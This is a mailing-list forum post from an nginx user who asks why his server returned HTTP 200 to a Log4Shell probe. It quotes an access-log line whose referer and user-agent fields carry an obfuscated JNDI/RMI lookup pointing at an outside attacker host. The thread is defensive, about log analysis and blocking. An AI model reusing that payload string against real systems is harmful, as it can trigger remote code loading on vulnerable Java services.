Welcome! Log In Create A New Profile

Advanced

200 html return to log4j exploit

December 19, 2021 11:04PM
I don't have any service using java so I don't believe I am subject to
this exploit. Howerver I am confused why a returned a 200 for this
request. The special characters in the URL are confusing.

200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / HTTP/1.1" 706 "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-"

log_format main '$status $remote_addr - $remote_user
[$time_local] "$request" ' '$body_bytes_sent "$http_referer" '
'"$http_user_agent" "$http_x_forwarded_for"';

That is my log format from the nginx.conf.

I now have a map to catch "jndi" in both url and agent. So far so good
not that it matters much. I just like to gather IP addresses from
hackers and block their host if it lacks eyeballs,
_______________________________________________
nginx mailing list
nginx@nginx.org
http://mailman.nginx.org/mailman/listinfo/nginx
Subject Author Posted

200 html return to log4j exploit

gariac December 19, 2021 11:04PM

Re: 200 html return to log4j exploit

Francis Daly December 20, 2021 04:20AM

Re: 200 html return to log4j exploit

Jay Caines-Gooby December 20, 2021 12:52PM

Re: 200 html return to log4j exploit

gariac December 20, 2021 02:10PM



Sorry, only registered users may post in this forum.

Click here to login

Online Users

Guests: 141
Record Number of Users: 8 on April 13, 2023
Record Number of Guests: 500 on July 15, 2024
Powered by nginx      Powered by FreeBSD      PHP Powered      Powered by MariaDB      ipv6 ready